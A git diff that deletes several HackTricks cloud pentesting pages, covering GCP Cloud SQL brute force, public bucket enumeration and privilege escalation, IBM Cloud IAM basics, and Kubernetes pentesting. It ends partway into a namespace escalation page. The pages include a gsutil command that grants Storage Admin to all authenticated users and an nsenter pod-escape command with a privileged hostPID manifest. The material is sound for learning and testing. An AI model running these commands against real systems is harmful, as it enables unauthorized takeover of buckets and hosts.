-{% endhint %} - -## Cloud SQL - -For more infromation about Cloud SQL check: - -{% content-ref url="../gcp-services/gcp-cloud-sql-enum.md" %} -[gcp-cloud-sql-enum.md](../gcp-services/gcp-cloud-sql-enum.md) -{% endcontent-ref %} - -### Brute Force - -If you have **access to a Cloud SQL port** because all internet is permitted or for any other reason, you can try to brute force credentials. - -Check this page for **different tools to burte-force** different database technologies: - -{% embed url="https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force" %} - -Remember that with some privileges it's possible to **list all the database users** via GCP API. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md deleted file mode 100644 index 200dd2333..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-compute-unauthenticated-enum.md +++ /dev/null @@ -1,49 +0,0 @@ -# GCP - Compute Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Compute - -For more information about Compute and VPC (Networking) check: - -{% content-ref url="../gcp-services/gcp-compute-instances-enum/" %} -[gcp-compute-instances-enum](../gcp-services/gcp-compute-instances-enum/) -{% endcontent-ref %} - -### SSRF - Server Side Request Forgery - -If a web is **vulnerable to SSRF** and it's possible to **add the metadata header**, an attacker could abuse it to access the SA OAuth token from the metadata endpoint. For more info about SSRF check: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery" %} - -### Vulnerable exposed services - -If a GCP instance has a vulnerable exposed service an attacker could abuse it to compromise it. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md deleted file mode 100644 index 143207a71..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-source-repositories-unauthenticated-enum.md +++ /dev/null @@ -1,46 +0,0 @@ -# GCP - Source Repositories Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Source Repositories - -For more information about Source Repositories check: - -{% content-ref url="../gcp-services/gcp-source-repositories-enum.md" %} -[gcp-source-repositories-enum.md](../gcp-services/gcp-source-repositories-enum.md) -{% endcontent-ref %} - -### Compromise External Repository - -If an external repository is being used via Source Repositories an attacker could add his malicious code to the repository and: - -* If someone uses Cloud Shell to develop the repository it could be compromised -* if this source repository is used by other GCP services, they could get compromised - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md deleted file mode 100644 index 39f682aa7..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/README.md +++ /dev/null @@ -1,99 +0,0 @@ -# GCP - Storage Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Storage - -For more information about Storage check: - -{% content-ref url="../../gcp-services/gcp-storage-enum.md" %} -[gcp-storage-enum.md](../../gcp-services/gcp-storage-enum.md) -{% endcontent-ref %} - -### Public Bucket Brute Force - -The **format of an URL** to access a bucket is **`https://storage.googleapis.com/`.** - -The following tools can be used to generate variations of the name given and search for miss-configured buckets with that names: - -* [https://github.com/RhinoSecurityLabs/GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - -**Also the tools** mentioned in: - -{% content-ref url="../" %} -[..](../) -{% endcontent-ref %} - -If you find that you can **access a bucket** you might be able to **escalate even further**, check: - -{% content-ref url="gcp-public-buckets-privilege-escalation.md" %} -[gcp-public-buckets-privilege-escalation.md](gcp-public-buckets-privilege-escalation.md) -{% endcontent-ref %} - -### Search Open Buckets in Current Account - -With the following script [gathered from here](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_misc/-/blob/master/find_open_buckets.sh) you can find all the open buckets: - -```bash -#!/bin/bash - -############################ -# Run this tool to find buckets that are open to the public anywhere -# in your GCP organization. -# -# Enjoy! -############################ - -for proj in $(gcloud projects list --format="get(projectId)"); do - echo "[*] scraping project $proj" - for bucket in $(gsutil ls -p $proj); do - echo " $bucket" - ACL="$(gsutil iam get $bucket)" - - all_users="$(echo $ACL | grep allUsers)" - all_auth="$(echo $ACL | grep allAuthenticatedUsers)" - - if [ -z "$all_users" ] - then - : - else - echo "[!] Open to all users: $bucket" - fi - - if [ -z "$all_auth" ] - then - : - else - echo "[!] Open to all authenticated users: $bucket" - fi - done -done -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md b/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md deleted file mode 100644 index bd3d71db2..000000000 --- a/pentesting-cloud/gcp-security/gcp-unauthenticated-enum-and-access/gcp-storage-unauthenticated-enum/gcp-public-buckets-privilege-escalation.md +++ /dev/null @@ -1,57 +0,0 @@ -# GCP - Public Buckets Privilege Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Buckets Privilege Escalation - -If the bucket policy allowed either “allUsers” or “allAuthenticatedUsers” to **write to their bucket policy** (the **storage.buckets.setIamPolicy** permission)**,** then anyone can modify the bucket policy and grant himself full access. - -### Check Permissions - -There are 2 ways to check the permissions over a bucket. The first one is to ask for them by making a request to `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam` or running `gsutil iam get gs://BUCKET_NAME`. - -However, if your user (potentially belonging to allUsers or allAuthenticatedUsers") doesn't have permissions to read the iam policy of the bucket (storage.buckets.getIamPolicy), that won't work. - -The other option which will always work is to use the testPermissions endpoint of the bucket to figure out if you have the specified permission, for example accessing: `https://www.googleapis.com/storage/v1/b/BUCKET_NAME/iam/testPermissions?permissions=storage.buckets.delete&permissions=storage.buckets.get&permissions=storage.buckets.getIamPolicy&permissions=storage.buckets.setIamPolicy&permissions=storage.buckets.update&permissions=storage.objects.create&permissions=storage.objects.delete&permissions=storage.objects.get&permissions=storage.objects.list&permissions=storage.objects.update` - -### Escalating - -In order to grant `Storage Admin` to `allAuthenticatedUsers` it's possible to run: - -```bash -gsutil iam ch allAuthenticatedUsers:admin gs://BUCKET_NAME -``` - -Another attack would be to **remove the bucket an d recreate it in your account to steal th ownership**. - -## References - -* [https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/](https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/README.md b/pentesting-cloud/ibm-cloud-pentesting/README.md deleted file mode 100644 index caf2dee60..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/README.md +++ /dev/null @@ -1,62 +0,0 @@ -# IBM Cloud Pentesting - -## IBM Cloud Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### What is IBM cloud? (By chatGPT) - -IBM Cloud, a cloud computing platform by IBM, offers a variety of cloud services such as infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). It enables clients to deploy and manage applications, handle data storage and analysis, and operate virtual machines in the cloud. - -When compared with Amazon Web Services (AWS), IBM Cloud showcases certain distinct features and approaches: - -1. **Focus**: IBM Cloud primarily caters to enterprise clients, providing a suite of services designed for their specific needs, including enhanced security and compliance measures. In contrast, AWS presents a broad spectrum of cloud services for a diverse clientele. -2. **Hybrid Cloud Solutions**: Both IBM Cloud and AWS offer hybrid cloud services, allowing integration of on-premises infrastructure with their cloud services. However, the methodology and services provided by each differ. -3. **Artificial Intelligence and Machine Learning (AI & ML)**: IBM Cloud is particularly noted for its extensive and integrated services in AI and ML. AWS also offers AI and ML services, but IBM's solutions are considered more comprehensive and deeply embedded within its cloud platform. -4. **Industry-Specific Solutions**: IBM Cloud is recognized for its focus on particular industries like financial services, healthcare, and government, offering bespoke solutions. AWS caters to a wide array of industries but might not have the same depth in industry-specific solutions as IBM Cloud. - -#### Basic Information - -For some basic information about IAM and hierarchi check: - -{% content-ref url="ibm-basic-information.md" %} -[ibm-basic-information.md](ibm-basic-information.md) -{% endcontent-ref %} - -### SSRF - -Learn how you can access the medata endpoint of IBM in the following page: - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#2af0" %} - -## References - -* [https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/#:\~:text=IBM%20Cloud%20is%3A,%2C%20networking%2C%20and%20database%20management.](https://redresscompliance.com/navigating-the-ibm-cloud-a-comprehensive-overview/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md b/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md deleted file mode 100644 index 034d4fa02..000000000 --- a/pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md +++ /dev/null @@ -1,99 +0,0 @@ -# IBM - Basic Information - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Hierarchy - -IBM Cloud resource model ([from the docs](https://www.ibm.com/blog/announcement/introducing-ibm-cloud-enterprises/)): - -
- -Recommended way to divide projects: - -
- -## IAM - -
- -### Users - -Users have an **email** assigned to them. They can access the **IBM console** and also **generate API keys** to use their permissions programatically.\ -**Permissions** can be granted **directly** to the user with an access policy or via an **access group**. - -### Trusted Profiles - -These are **like the Roles of AWS** or service accounts from GCP. It's possible to **assign them to VM** instances and access their **credentials via metadata**, or even **allow Identity Providers** to use them in order to authenticate users from external platforms.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy or via an **access group**. - -### Service IDs - -This is another option to allow applications to **interact with IBM cloud** and perform actions. In this case, instead of assign it to a VM or Identity Provider an **API Key can be used** to interact with IBM in a **programatic** way.\ -**Permissions** can be granted **directly** to the service id with an access policy or via an **access group**. - -### Identity Providers - -External **Identity Providers** can be configured to **access IBM cloud** resources from external platforms by accessing **trusting Trusted Profiles**. - -### Access Groups - -In the same access group **several users, trusted profiles & service ids** can be present. Each principal in the access group will **inherit the access group permissions**.\ -**Permissions** can be granted **directly** to the trusted profile with an access policy.\ -An **access group cannot be a member** of another access group. - -### Roles - -A role is a **set of granular permissions**. **A role** is dedicated to **a service**, meaning that it will only contain permissions of that service.\ -**Each service** of IAM will already have some **possible roles** to choose from to **grant a principal access to that service**: **Viewer, Operator, Editor, Administrator** (although there could be more). - -Role permissions are given via access policies to principals, so if you need to give for example a **combination of permissions** of a service of **Viewer** and **Administrator**, instead of giving those 2 (and overprivilege a principal), you can **create a new role** for the service and give that new role the **granular permissions you need**. - -### Access Policies - -Access policies allows to **attach 1 or more roles of 1 service to 1 principal**.\ -When creating the policy you need to choose: - -* The **service** where permissions will be granted -* **Affected resources** -* Service & Platform **access** that will be granted - * These indicate the **permissions** that will be given to the principal to perform actions. If any **custom role** is created in the service you will also be able to choose it here. -* **Conditions** (if any) to grant the permissions - -{% hint style="info" %} -To grant access to several services to a user, you can generate several access policies -{% endhint %} - -
- -## References - -* [https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises](https://www.ibm.com/cloud/blog/announcements/introducing-ibm-cloud-enterprises) -* [https://cloud.ibm.com/docs/account?topic=account-iamoverview](https://cloud.ibm.com/docs/account?topic=account-iamoverview) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/README.md b/pentesting-cloud/kubernetes-security/README.md deleted file mode 100644 index c7b6d358f..000000000 --- a/pentesting-cloud/kubernetes-security/README.md +++ /dev/null @@ -1,106 +0,0 @@ -# Kubernetes Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Kubernetes Basics - -If you don't know anything about Kubernetes this is a **good start**. Read it to learn about the **architecture, components and basic actions** in Kubernetes: - -{% content-ref url="kubernetes-basics.md" %} -[kubernetes-basics.md](kubernetes-basics.md) -{% endcontent-ref %} - -### Labs to practice and learn - -* [https://securekubernetes.com/](https://securekubernetes.com) -* [https://madhuakula.com/kubernetes-goat/index.html](https://madhuakula.com/kubernetes-goat/index.html) - -## Hardening Kubernetes / Automatic Tools - -{% content-ref url="kubernetes-hardening/" %} -[kubernetes-hardening](kubernetes-hardening/) -{% endcontent-ref %} - -## Manual Kubernetes Pentest - -### From the Outside - -There are several possible **Kubernetes services that you could find exposed** on the Internet (or inside internal networks). If you find them you know there is Kubernetes environment in there. - -Depending on the configuration and your privileges you might be able to abuse that environment, for more information: - -{% content-ref url="pentesting-kubernetes-services/" %} -[pentesting-kubernetes-services](pentesting-kubernetes-services/) -{% endcontent-ref %} - -### Enumeration inside a Pod - -If you manage to **compromise a Pod** read the following page to learn how to enumerate and try to **escalate privileges/escape**: - -{% content-ref url="attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -### Enumerating Kubernetes with Credentials - -You might have managed to compromise **user credentials, a user token or some service account toke**n. You can use it to talk to the Kubernetes API service and try to **enumerate it to learn more** about it: - -{% content-ref url="kubernetes-enumeration.md" %} -[kubernetes-enumeration.md](kubernetes-enumeration.md) -{% endcontent-ref %} - -Another important details about enumeration and Kubernetes permissions abuse is the **Kubernetes Role-Based Access Control (RBAC)**. If you want to abuse permissions, you first should read about it here: - -{% content-ref url="kubernetes-role-based-access-control-rbac.md" %} -[kubernetes-role-based-access-control-rbac.md](kubernetes-role-based-access-control-rbac.md) -{% endcontent-ref %} - -#### Knowing about RBAC and having enumerated the environment you can now try to abuse the permissions with: - -{% content-ref url="abusing-roles-clusterroles-in-kubernetes/" %} -[abusing-roles-clusterroles-in-kubernetes](abusing-roles-clusterroles-in-kubernetes/) -{% endcontent-ref %} - -### Privesc to a different Namespace - -If you have compromised a namespace you can potentially escape to other namespaces with more interesting permissions/resources: - -{% content-ref url="kubernetes-namespace-escalation.md" %} -[kubernetes-namespace-escalation.md](kubernetes-namespace-escalation.md) -{% endcontent-ref %} - -### From Kubernetes to the Cloud - -If you have compromised a K8s account or a pod, you might be able able to move to other clouds. This is because in clouds like AWS or GCP is possible to **give a K8s SA permissions over the cloud**. - -{% content-ref url="kubernetes-pivoting-to-clouds.md" %} -[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md b/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md deleted file mode 100644 index f913d5ccf..000000000 --- a/pentesting-cloud/kubernetes-security/abusing-roles-clusterroles-in-kubernetes/pod-escape-privileges.md +++ /dev/null @@ -1,63 +0,0 @@ -# Pod Escape Privileges - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Privileged and hostPID - -With these privileges you will have **access to the hosts processes** and **enough privileges to enter inside the namespace of one of the host processes**.\ -Note that you can potentially not need privileged but just some capabilities and other potential defenses bypasses (like apparmor and/or seccomp). - -Just executing something like the following will allow you to escape from the pod: - -```bash -nsenter --target 1 --mount --uts --ipc --net --pid -- bash -``` - -Configuration example: - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: priv-and-hostpid-exec-pod - labels: - app: pentest -spec: - hostPID: true - containers: - - name: priv-and-hostpid-pod - image: ubuntu - tty: true - securityContext: - privileged: true - command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ] - #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md b/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md deleted file mode 100644 index de5c06b84..000000000 --- a/pentesting-cloud/kubernetes-security/kubernetes-namespace-escalation.md +++ /dev/null @@ -1,59 +0,0 @@ -# Kubernetes Namespace Escalation - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
